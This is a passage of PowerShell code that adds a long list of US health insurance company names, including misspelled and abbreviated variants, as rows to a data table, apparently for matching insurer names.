$InsuranceCompanies.Rows.Add("CareFirst of Maryland, Inc.") + $null = $InsuranceCompanies.Rows.Add("CFMI, Inc.") + $null = $InsuranceCompanies.Rows.Add("CareFirst of Maryland Inc.") + $null = $InsuranceCompanies.Rows.Add("CFMI, Inc") + $null = $InsuranceCompanies.Rows.Add("CareFirst of Maryland , Inc.") + $null = $InsuranceCompanies.Rows.Add("MAMSI Life and Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Coventry Health and Life Company") + $null = $InsuranceCompanies.Rows.Add("Evergreen Health CO-OP") + $null = $InsuranceCompanies.Rows.Add("Evergreen Health Cooperative, Inc.") + $null = $InsuranceCompanies.Rows.Add("Evergreen Health Cooperative Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of the Mid-Atlantic States Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of the Mid-Atlantic States") + $null = $InsuranceCompanies.Rows.Add("Group Hospitalization and Medical Services Inc.") + $null = $InsuranceCompanies.Rows.Add("Group Hospitalization and Medical Services, Inc.") + $null = $InsuranceCompanies.Rows.Add("HPHC Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("HPHC Insurnace Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("Maine Community Health Options") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans of Maine, Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a ME corp.)") + $null = $InsuranceCompanies.Rows.Add("The MEGA Life and Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthCare") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim Health Care, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthPlus") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Michigan") + $null = $InsuranceCompanies.Rows.Add("MHP") + $null = $InsuranceCompanies.Rows.Add("McLaren Health Plan") + $null = $InsuranceCompanies.Rows.Add("PHP Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Paramount Care of Michigan") + $null = $InsuranceCompanies.Rows.Add("Priority Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Priority Health") + $null = $InsuranceCompanies.Rows.Add("Harbor Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Grand Valley Heath Plans") + $null = $InsuranceCompanies.Rows.Add("Grand Valley Health Plans") + $null = $InsuranceCompanies.Rows.Add("Health Alliance Plan of Michigan") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Michigan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Michigan, Inc") + $null = $InsuranceCompanies.Rows.Add("Consumers Mutual Insurance of Michigan") + $null = $InsuranceCompanies.Rows.Add("Assurity Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE LIFE INSURANCE COMPANY") + $null = $InsuranceCompanies.Rows.Add("Humana Medical Plan of Michigan, Inc") + $null = $InsuranceCompanies.Rows.Add("Meridian Health Plan of Michigan") + $null = $InsuranceCompanies.Rows.Add("US Health and Life") + $null = $InsuranceCompanies.Rows.Add("HealthPlus Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Physicians Health Plan") + $null = $InsuranceCompanies.Rows.Add("Physician's Health Plan") + $null = $InsuranceCompanies.Rows.Add("Total Health Care, Inc") + $null = $InsuranceCompanies.Rows.Add("Total Health Care USA") + $null = $InsuranceCompanies.Rows.Add("Total Health Care USA, Inc") + $null = $InsuranceCompanies.Rows.Add("Total Health Care") + $null = $InsuranceCompanies.Rows.Add("Total Health Care USA, Inc.") + $null = $InsuranceCompanies.Rows.Add("Alliance Health and Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Alliance Health & Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Alliance Health & Life Insurance") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Community Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("McLaren Health Plan Community") + $null = $InsuranceCompanies.Rows.Add("Paramount Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Blue Care Network of Michigan") + $null = $InsuranceCompanies.Rows.Add("MIC") + $null = $InsuranceCompanies.Rows.Add("Group Health") + $null = $InsuranceCompanies.Rows.Add("Group Health Inc.") + $null = $InsuranceCompanies.Rows.Add("GHI") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Minnesota") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of Minnesota") + $null = $InsuranceCompanies.Rows.Add("BCBSM, INC.") + $null = $InsuranceCompanies.Rows.Add("BCBSM INC.") + $null = $InsuranceCompanies.Rows.Add("HMO MINNESOTA") + $null = $InsuranceCompanies.Rows.Add("Medica Health Plans of Wisconsin - MN") + $null = $InsuranceCompanies.Rows.Add("Medica Health Plans of Wisconsin") + $null = $InsuranceCompanies.Rows.Add("Gundersen Health Plan Minnesota") + $null = $InsuranceCompanies.Rows.Add("HealthPartners, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthPartners Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UCare Minnesota") + $null = $InsuranceCompanies.Rows.Add("PreferredOne Insurance Company") + $null = $InsuranceCompanies.Rows.Add("PreferredOne") + $null = $InsuranceCompanies.Rows.Add("PreferredOne Community Health Plan") + $null = $InsuranceCompanies.Rows.Add("Healthy Alliance Life Insurance Company (HALIC)") + $null = $InsuranceCompanies.Rows.Add("Healthy Alliance Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc") + $null = $InsuranceCompanies.Rows.Add("Coventry Health & Life Insurance Co") + $null = $InsuranceCompanies.Rows.Add("CHL MO") + $null = $InsuranceCompanies.Rows.Add("Aetna Life Insurance Co") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of MO") + $null = $InsuranceCompanies.Rows.Add("Missouri Care, Incorporated") + $null = $InsuranceCompanies.Rows.Add("HMO Missouri, Inc.") + $null = $InsuranceCompanies.Rows.Add("Cox Health Systems Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Blue Cross & Blue Shield of Mississippi") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care") + $null = $InsuranceCompanies.Rows.Add("Ambetter of Magnolia Inc.") + $null = $InsuranceCompanies.Rows.Add("Magnolia Health Plan") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Mississippi, Inc.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Mississippi, Inc.") + $null = $InsuranceCompanies.Rows.Add("United Healthcare of Mississippi") + $null = $InsuranceCompanies.Rows.Add("BCBSMT") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Montana") + $null = $InsuranceCompanies.Rows.Add("Montana Health Cooperative") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of North Carolina") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of NC") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of North Carolina") + $null = $InsuranceCompanies.Rows.Add("FirstCarolinaCare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of North Carolina, Inc.") + $null = $InsuranceCompanies.Rows.Add("WP NC") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of the Carolinas") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of the Carolinas, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Ins Co of River Valley") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (Pennsylvania)") + $null = $InsuranceCompanies.Rows.Add("Cigna HealthCare of North Carolina, Inc.") + $null = $InsuranceCompanies.Rows.Add("Coventry Health & Life") + $null = $InsuranceCompanies.Rows.Add("Noridian Mutual Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of North Dakota") + $null = $InsuranceCompanies.Rows.Add("Medica Health Plans - ND") + $null = $InsuranceCompanies.Rows.Add("Medica Health Plans") + $null = $InsuranceCompanies.Rows.Add("Sanford Health Plan of North Dakota") + $null = $InsuranceCompanies.Rows.Add("Coventry Health Care of Nebraska Inc.") + $null = $InsuranceCompanies.Rows.Add("CHC NE") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Nebraska") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare") + $null = $InsuranceCompanies.Rows.Add("CHL NE") + $null = $InsuranceCompanies.Rows.Add("Anthem Health Plans of New Hampshire") + $null = $InsuranceCompanies.Rows.Add("ANTHEM HEALTH PLANS OF NEW HAMPSHIRE") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim Health Care of New England") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim HealthCare") + $null = $InsuranceCompanies.Rows.Add("Harvard Pilgrim HealthCare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Tufts Health Freedom Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Matthew Thornton Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Freelancers CO-OP of New Jersey") + $null = $InsuranceCompanies.Rows.Add("Health Republic Insurance of New Jersey") + $null = $InsuranceCompanies.Rows.Add("Freelancers Consumer Operated and Oriented Program of New Jersey, Inc.") + $null = $InsuranceCompanies.Rows.Add("Horizon HMO") + $null = $InsuranceCompanies.Rows.Add("Horizon Blue Cross Blue Shield of New Jersey") + $null = $InsuranceCompanies.Rows.Add("Horizon Healhcare of New Jersey, Inc.") + $null = $InsuranceCompanies.Rows.Add("Horizon Healthcare of New Jersey, Inc.") + $null = $InsuranceCompanies.Rows.Add("Cigna Healthcare of New Jersey, Inc.") + $null = $InsuranceCompanies.Rows.Add("Cigna HealthCare of New Jersey, Inc.") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Plans (NJ), Inc.") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Plans (NJ), INC.") + $null = $InsuranceCompanies.Rows.Add("Oscar Insurance Corporation of New Jersey") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Insurance Inc.") + $null = $InsuranceCompanies.Rows.Add("OXFORD HEALTH INSURANCE, INC.") + $null = $InsuranceCompanies.Rows.Add("OXFORD HEALTH INSURANCE (NJ), INC.") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Insurance (NJ), Inc.") + $null = $InsuranceCompanies.Rows.Add("AmeriHealth HMO, Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna Health Inc. (a NJ corp.)") + $null = $InsuranceCompanies.Rows.Add("CarePoint Health Plan") + $null = $InsuranceCompanies.Rows.Add("Horizon Blue Cross Blue Shield of New Jersey, Inc") + $null = $InsuranceCompanies.Rows.Add("Horizon Healthcare Services, Inc.") + $null = $InsuranceCompanies.Rows.Add("AmeriHealth Ins Company of New Jersey") + $null = $InsuranceCompanies.Rows.Add("AmeriHealth Insurance Company of New Jersey") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of New Mexico, Inc.") + $null = $InsuranceCompanies.Rows.Add("Presbyterian Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("Presbyterian Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Presbyterian Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Presbyterian Health Plan") + $null = $InsuranceCompanies.Rows.Add("CHRISTUS Health Plan") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of New Mexico") + $null = $InsuranceCompanies.Rows.Add("New Mexico Health Connections") + $null = $InsuranceCompanies.Rows.Add("Lovelace Health System, Inc.") + $null = $InsuranceCompanies.Rows.Add("Saint Mary's Health First") + $null = $InsuranceCompanies.Rows.Add("Saint Mary's HealthFirst") + $null = $InsuranceCompanies.Rows.Add("Prominence HealthFirst, Inc.") + $null = $InsuranceCompanies.Rows.Add("Prominence HealthFirst") + $null = $InsuranceCompanies.Rows.Add("Rocky Mountain Hospital and Medical Service, Inc. (PPO)") + $null = $InsuranceCompanies.Rows.Add("Nevada Health CO-OP") + $null = $InsuranceCompanies.Rows.Add("Hometown Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Connecticut General and Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("HMO Colorado, Inc, D.B.A. HMO Nevada?") + $null = $InsuranceCompanies.Rows.Add("HMO Colorado, Inc. dba HMO Nevada") + $null = $InsuranceCompanies.Rows.Add("HMO Colorado, Inc, D.B.A. HMO Nevada") + $null = $InsuranceCompanies.Rows.Add("Saint Mary's Preferred Health Insurance Co.") + $null = $InsuranceCompanies.Rows.Add("Prominence Health Insurance Co., Inc.") + $null = $InsuranceCompanies.Rows.Add("Prominence Preferred Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Sierra Health & Life Ins., Co., Inc.") + $null = $InsuranceCompanies.Rows.Add("Sierra Health & Life Ins., Inc.") + $null = $InsuranceCompanies.Rows.Add("Sierra Health & Life Ins. Co., Inc.") + $null = $InsuranceCompanies.Rows.Add("Hometown Health Providers' Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Hometown Health Providers Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Health Plan of Nevada, inc.") + $null = $InsuranceCompanies.Rows.Add("Health Plan of Nevada, Inc.") + $null = $InsuranceCompanies.Rows.Add("MetroPlus Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("MetroPlus Health Plan") + $null = $InsuranceCompanies.Rows.Add("Independenth Health Benefits Corporation") + $null = $InsuranceCompanies.Rows.Add("Independent Health Benefits Corporation") + $null = $InsuranceCompanies.Rows.Add("HIP Insurance Company") + $null = $InsuranceCompanies.Rows.Add("New York State Catholic Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("New York State Catholic Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("New York State Catholic Health Plan") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Plans (NY), Inc.") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Plans (NY), Inc. (OHP)") + $null = $InsuranceCompanies.Rows.Add("Universal American") + $null = $InsuranceCompanies.Rows.Add("BlueShield of Northeastern NY") + $null = $InsuranceCompanies.Rows.Add("BlueShield of Northeastern New York") + $null = $InsuranceCompanies.Rows.Add("WellCare of New York, Inc.") + $null = $InsuranceCompanies.Rows.Add("WellCare of New Yok") + $null = $InsuranceCompanies.Rows.Add("HealthNow New York Incorporated") + $null = $InsuranceCompanies.Rows.Add("Crystal Run Health Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("Empire HealthChoice Assurance, Inc.") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of Western New York") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of Western NY") + $null = $InsuranceCompanies.Rows.Add("Blue Cross BlueShield of Western New York") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of New York, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of New York Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of New York, Inc. (UHC)") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company of New York") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company of New York (UHIC)") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company of New York, Inc.") + $null = $InsuranceCompanies.Rows.Add("MVP Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("MVP Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Affinity Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Affinity Health Plan") + $null = $InsuranceCompanies.Rows.Add("Healthfirst Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("Independent Health Association") + $null = $InsuranceCompanies.Rows.Add("Freelancers Health Service Corporation") + $null = $InsuranceCompanies.Rows.Add("Health Republic Insurance of New York") + $null = $InsuranceCompanies.Rows.Add("Crystal Run Health Plan") + $null = $InsuranceCompanies.Rows.Add("Crystal Run Health Plan, LLC") + $null = $InsuranceCompanies.Rows.Add("Oscar Insurance Corporation") + $null = $InsuranceCompanies.Rows.Add("Excellus Health Plan, Inc") + $null = $InsuranceCompanies.Rows.Add("Excellus Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Empire HealthChoice HMO, Inc.") + $null = $InsuranceCompanies.Rows.Add("Empire HealthChoice HMO Inc.") + $null = $InsuranceCompanies.Rows.Add("North Shore-LIJ Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("North Shore-LIJ CareConnect Insurance Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("North Shore-LIJ CareConnect Insurance Company Inc.") + $null = $InsuranceCompanies.Rows.Add("Managed Health, Inc") + $null = $InsuranceCompanies.Rows.Add("Healthfirst Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Oxford Health Insurance, Inc. (OHI)") + $null = $InsuranceCompanies.Rows.Add("Health Insurance Plan of Greater New York") + $null = $InsuranceCompanies.Rows.Add("Health Plan of Greater New York") + $null = $InsuranceCompanies.Rows.Add("MVP Health Services Corporation") + $null = $InsuranceCompanies.Rows.Add("MVP Health Services Corp.") + $null = $InsuranceCompanies.Rows.Add("Healthfirst PSHP") + $null = $InsuranceCompanies.Rows.Add("Healthfirst PHSP, Inc.") + $null = $InsuranceCompanies.Rows.Add("Healthfirst PHSP Inc.") + $null = $InsuranceCompanies.Rows.Add("CDPHP Universal Benefits, Inc.") + $null = $InsuranceCompanies.Rows.Add("CDPHP, Universal Benefits Inc.") + $null = $InsuranceCompanies.Rows.Add("CDPHP,Universal Benefits Inc.") + $null = $InsuranceCompanies.Rows.Add("Capital District Physicians' Health Plan") + $null = $InsuranceCompanies.Rows.Add("Capital District Physicians Health Plan Inc.") + $null = $InsuranceCompanies.Rows.Add("Capital District Physicians Health Plan") + $null = $InsuranceCompanies.Rows.Add("Coordinated Health Mutual, Inc.") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of Ohio, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthSpan Integrated Care") + $null = $InsuranceCompanies.Rows.Add("Consumers Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Premier Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("AultCare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Community Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE INSURANCE COMPANY OF RIVER VALLEY") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance Company of River Valley") + $null = $InsuranceCompanies.Rows.Add("UNITEDHEALTHCARE OF OHIO") + $null = $InsuranceCompanies.Rows.Add("Buckeye Community Health Plan") + $null = $InsuranceCompanies.Rows.Add("SummaCare Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Summa Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Ohio, Inc.") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Ohio, Inc") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan of Ohio") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan of OH, Inc.") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan of Ohio, Inc.") + $null = $InsuranceCompanies.Rows.Add("Paramount Health Care") + $null = $InsuranceCompanies.Rows.Add("CareSource") + $null = $InsuranceCompanies.Rows.Add("CareSource Ohio Co") + $null = $InsuranceCompanies.Rows.Add("The Health Plan of the Upper Ohio Valley, Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthSpan, Inc.") + $null = $InsuranceCompanies.Rows.Add("THP Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Coventry Health & Life Insurance Company (dba HealthAmerica)") + $null = $InsuranceCompanies.Rows.Add("Medical Health Insurance Corp of Ohio") + $null = $InsuranceCompanies.Rows.Add("Medical Health Insuring Corp of Ohio") + $null = $InsuranceCompanies.Rows.Add("Medical Health Insuring Corp. of Ohio") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Oklahoma, Inc.") + $null = $InsuranceCompanies.Rows.Add("CHL OK") + $null = $InsuranceCompanies.Rows.Add("GHS Health Maintenance Organization, Inc.") + $null = $InsuranceCompanies.Rows.Add("GHS Health Maintenance Organization, Inc. d/b/a BlueLincs HMO") + $null = $InsuranceCompanies.Rows.Add("GlobalHealth") + $null = $InsuranceCompanies.Rows.Add("GlobalHealth, Inc") + $null = $InsuranceCompanies.Rows.Add("GlobalHealth, Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Oklahoma") + $null = $InsuranceCompanies.Rows.Add("Blue Cross and Blue Shield of Oklahoma") + $null = $InsuranceCompanies.Rows.Add("CommunityCare Life and Health Company") + $null = $InsuranceCompanies.Rows.Add("CommunityCare Life and Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Live Insurance Company") + $null = $InsuranceCompanies.Rows.Add("CommunityCare HMO, Inc.") + $null = $InsuranceCompanies.Rows.Add("Health Net Health Plan of Oregon") + $null = $InsuranceCompanies.Rows.Add("Health Net Health Plan of Oregon, Inc.") + $null = $InsuranceCompanies.Rows.Add("Zoom Health Plan") + $null = $InsuranceCompanies.Rows.Add("ZOOM+ Performance Health Insurance") + $null = $InsuranceCompanies.Rows.Add("ATRIO Health Plans") + $null = $InsuranceCompanies.Rows.Add("ATRIO") + $null = $InsuranceCompanies.Rows.Add("Samaritan Health Plan") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Oregon") + $null = $InsuranceCompanies.Rows.Add("Providence Health Plans") + $null = $InsuranceCompanies.Rows.Add("BridgeSpan Health Oregon") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundataion Healthplan of the Northwest") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Healthplan of the Northwest") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of Oregon") + $null = $InsuranceCompanies.Rows.Add("Kaiser Foundation Health Plan of the Northwest") + $null = $InsuranceCompanies.Rows.Add("Regence BlueCross BlueShield of Oregon") + $null = $InsuranceCompanies.Rows.Add("Lifewise Health Plan of Oregon") + $null = $InsuranceCompanies.Rows.Add("LifeWise Health Plan of Oregon") + $null = $InsuranceCompanies.Rows.Add("Trillium Community Health Plan") + $null = $InsuranceCompanies.Rows.Add("Freelancers CO-OP of Oregon") + $null = $InsuranceCompanies.Rows.Add("Health Republic Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Oregon's Health CO-OP") + $null = $InsuranceCompanies.Rows.Add("UPMC Health Options, Inc.") + $null = $InsuranceCompanies.Rows.Add("UPMC Health Options") + $null = $InsuranceCompanies.Rows.Add("UPMC Health Network, Inc.") + $null = $InsuranceCompanies.Rows.Add("Aetna HealthAssurance Pennsylvania, Inc.") + $null = $InsuranceCompanies.Rows.Add("Geisinger Health Plan") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Pennsylvania, Inc.") + $null = $InsuranceCompanies.Rows.Add("Independence Blue Cross (QCC Ins. Co.)") + $null = $InsuranceCompanies.Rows.Add("QCC Insurance Company") + $null = $InsuranceCompanies.Rows.Add("QCC") + $null = $InsuranceCompanies.Rows.Add("Highmark") + $null = $InsuranceCompanies.Rows.Add("Highmark Health Services") + $null = $InsuranceCompanies.Rows.Add("Highmark, Inc.") + $null = $InsuranceCompanies.Rows.Add("Keystone Health Plan East, Inc.") + $null = $InsuranceCompanies.Rows.Add("Keystone Health Plan East, Inc.") + $null = $InsuranceCompanies.Rows.Add("KHPE") + $null = $InsuranceCompanies.Rows.Add("Highmark Select Resources Inc.") + $null = $InsuranceCompanies.Rows.Add("Highmark Select Resources") + $null = $InsuranceCompanies.Rows.Add("Keystone West") + $null = $InsuranceCompanies.Rows.Add("KHPW") + $null = $InsuranceCompanies.Rows.Add("Keystone Health Plan West") + $null = $InsuranceCompanies.Rows.Add("Highmark Choice Company") + $null = $InsuranceCompanies.Rows.Add("Capital Advantage Assurance Company - CAAC") + $null = $InsuranceCompanies.Rows.Add("Capital Advantage Assurance Company") + $null = $InsuranceCompanies.Rows.Add("UPMC Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Keystone Health Plan Central") + $null = $InsuranceCompanies.Rows.Add("First Priority Life Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UPMC Health Coverage, Inc.") + $null = $InsuranceCompanies.Rows.Add("UPMC Health Coverage") + $null = $InsuranceCompanies.Rows.Add("Inter-County Health Plan") + $null = $InsuranceCompanies.Rows.Add("HHIC") + $null = $InsuranceCompanies.Rows.Add("Highmark Health Insurance Company (HHIC)") + $null = $InsuranceCompanies.Rows.Add("Geisinger Quality Options") + $null = $InsuranceCompanies.Rows.Add("Highmark Coverage Advantage") + $null = $InsuranceCompanies.Rows.Add("Highmark Benefits Group") + $null = $InsuranceCompanies.Rows.Add("Capital Advantage Insurance Company - CAIC") + $null = $InsuranceCompanies.Rows.Add("Capital Advantage Insurance Company CAIC - PA") + $null = $InsuranceCompanies.Rows.Add("Capital Advantage Insurance Company") + $null = $InsuranceCompanies.Rows.Add("First Priority Health") + $null = $InsuranceCompanies.Rows.Add("HealthAmerica, Pennsylvania Inc") + $null = $InsuranceCompanies.Rows.Add("HealthAmerica, Pennsylvania Inc.") + $null = $InsuranceCompanies.Rows.Add("HealthAssurance, Pennsylvania Inc") + $null = $InsuranceCompanies.Rows.Add("HealthAssurance PA, Inc") + $null = $InsuranceCompanies.Rows.Add("Blue Cross & Blue Shield of RI") + $null = $InsuranceCompanies.Rows.Add("Blue Cross & Blue Shield of Rhode Island") + $null = $InsuranceCompanies.Rows.Add("Neighborhood Health Plan of Rhode Island") + $null = $InsuranceCompanies.Rows.Add("NHPRI") + $null = $InsuranceCompanies.Rows.Add("United HealthCare of New England, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of New England, Inc.") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of New England Inc.") + $null = $InsuranceCompanies.Rows.Add("UHCNE") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of South Carolina") + $null = $InsuranceCompanies.Rows.Add("WP SC") + $null = $InsuranceCompanies.Rows.Add("CHC SC") + $null = $InsuranceCompanies.Rows.Add("BlueChoice HealthPlan of South Carolina, Inc.") + $null = $InsuranceCompanies.Rows.Add("BlueChoice HealthPlan") + $null = $InsuranceCompanies.Rows.Add("BlueChoice HealthPlan Inc.") + $null = $InsuranceCompanies.Rows.Add("BlueChoice HealthPlan, Inc.") + $null = $InsuranceCompanies.Rows.Add("CHL SC") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare Insurance company") + $null = $InsuranceCompanies.Rows.Add("Consumers Choice Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Consumers' Choice Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Consumers? Choice Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Consumers' Choice Health Plan") + $null = $InsuranceCompanies.Rows.Add("Sanford Health Plan of South Dakota") + $null = $InsuranceCompanies.Rows.Add("Wellmark Blue Cross Blue Shield of South Dakota") + $null = $InsuranceCompanies.Rows.Add("Wellmark of South Dakota") + $null = $InsuranceCompanies.Rows.Add("South Dakota State Medical Holding Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("South Dakota State Holding Company, Inc.") + $null = $InsuranceCompanies.Rows.Add("South Dakota State Medical Holding Company, Inc. dba DAKOTACARE") + $null = $InsuranceCompanies.Rows.Add("CHL SD") + $null = $InsuranceCompanies.Rows.Add("BCBST") + $null = $InsuranceCompanies.Rows.Add("BlueCross BlueShield of Tennessee, Inc.") + $null = $InsuranceCompanies.Rows.Add("TRH Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("UnitedHealtcare Plan of the River Valley, Inc.") + $null = $InsuranceCompanies.Rows.Add("Community Health Alliance Mutual Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Health Insurance Holdings, Inc.") + $null = $InsuranceCompanies.Rows.Add("Oscar Insurance Company of Texas") + $null = $InsuranceCompanies.Rows.Add("Standard Life and Casualty Insurance Company") + $null = $InsuranceCompanies.Rows.Add("SHA, LLC DBA FirstCare Health Plans") + $null = $InsuranceCompanies.Rows.Add("Community Health Choice, Inc.") + $null = $InsuranceCompanies.Rows.Add("Community Health Choice") + $null = $InsuranceCompanies.Rows.Add("MHealth") + $null = $InsuranceCompanies.Rows.Add("Memorial Hermann Health Insurance Company") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan of Texas") + $null = $InsuranceCompanies.Rows.Add("Humana Health Plan of TX, Inc.") + $null = $InsuranceCompanies.Rows.Add("Blue Cross Blue Shield of Texas") + $null = $InsuranceCompanies.Rows.Add("Prominence HealthFirst of Texas, Inc.") + $null = $InsuranceCompanies.Rows.Add("ICSW") + $null = $InsuranceCompanies.Rows.Add("Insurance Company of Scott & White") + $null = $InsuranceCompanies.Rows.Add("Insurance Company of Scott and White") + $null = $InsuranceCompanies.Rows.Add("UnitedHealthcare of Texas, Inc.") + $null = $InsuranceCompanies.Rows.Add("UHC") + $null = $InsuranceCompanies.Rows.Add("Scott & White Health Plan") + $null = $InsuranceCompanies.Rows.Add("Scott and White Health Plan") + $null = $InsuranceCompanies.Rows.Add("Memorial Hermann Health Plan, Inc.") + $null = $InsuranceCompanies.Rows.Add("Memorial Hermann Health Plan") + $null = $InsuranceCompanies.Rows.Add("Southwest Life & Health Insurance Co.") + $null = $InsuranceCompanies.Rows.Add("Southwest Life & Health") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Texas, Inc") + $null = $InsuranceCompanies.Rows.Add("Molina Healthcare of Texas, Inc.") + $null = $InsuranceCompanies.Rows.Add("Community First Health Plans, Inc.") + $null = 